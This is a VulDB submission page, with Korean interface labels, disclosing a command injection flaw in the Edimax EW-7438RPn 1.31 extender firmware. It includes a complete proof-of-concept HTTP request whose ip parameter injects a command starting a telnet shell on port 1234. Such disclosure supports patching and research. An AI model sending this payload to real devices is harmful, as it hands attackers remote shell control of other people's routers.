| 제목 | Edimax EW-7438RPn 1.31 Command Injection |
|---|
| 설명 | We found a command injection vulnerability in an Edimax extender with recently released firmware, which allows remote attackers to execute arbitrary OS commands via a crafted request.In formWizSurvey function, ip、mask、gateway is directly passed by the attacker, so we can control the ip、mask、gateway to attack the OS.
POST /goform/formWizSurvey HTTP/1.1
Host: 192.168.0.4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Origin: http://192.168.0.4
Authorization: Basic YWRtaW46MTIzNA==
Connection: keep-alive
Referer: http://192.168.0.4/conn_test_wep.asp
Cookie: language=16
Upgrade-Insecure-Requests: 1
Priority: u=0, i
set_vxd_ip=1&ip=`telnetd -l /bin/sh -p 1234`&mask=x.x.x.x&gateway=192.168.0.1&NEXT=%E4%B8%8B%E4%B8%80%E6%AD%A5 |
|---|
| 원천 | ⚠️ https://github.com/wudipjq/my_vuln/blob/main/Edimax/vuln_5/5.md |
|---|
| 사용자 | Bond_yes (UID 89043) |
|---|
| 제출 | 2026. 04. 27. AM 07:43 (1 월 ago) |
|---|
| 모더레이션 | 2026. 05. 23. AM 10:32 (26 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 365310 [Edimax EW-7438RPn 까지 1.31 webs /goform/formWizSurvey ip/mask/gateway 권한 상승] |
|---|
| 포인트들 | 20 |
|---|